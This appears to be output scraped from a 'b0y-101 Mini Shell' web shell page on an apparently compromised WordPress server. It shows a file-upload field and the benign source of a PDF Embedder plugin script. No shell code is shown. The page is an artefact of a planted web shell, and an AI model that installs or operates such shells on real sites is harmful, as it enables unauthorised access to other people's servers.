b0y-101 Mini Shell


Current Path : E:/www/raff/wp-content/plugins/pdf-embedder/assets/js/
File Upload :
Current File : E:/www/raff/wp-content/plugins/pdf-embedder/assets/js/pdfemb-basic.js

jQuery(document).ready(function($) {

    var pdfembPagesViewer = PDFEMB_NS.pdfembPagesViewer;

    var pdfembPagesViewerBasic = function () {
        pdfembPagesViewer.apply(this, arguments);
    };

    pdfembPagesViewerBasic.prototype = new pdfembPagesViewer();

    PDFEMB_NS.pdfembPagesViewerUsable = pdfembPagesViewerBasic;

});

PDFEMB_NS.pdfembGetPDF = function(url, callback) {
	    	
	callback(url, false);

};

Copyright © 2019 by b0y-101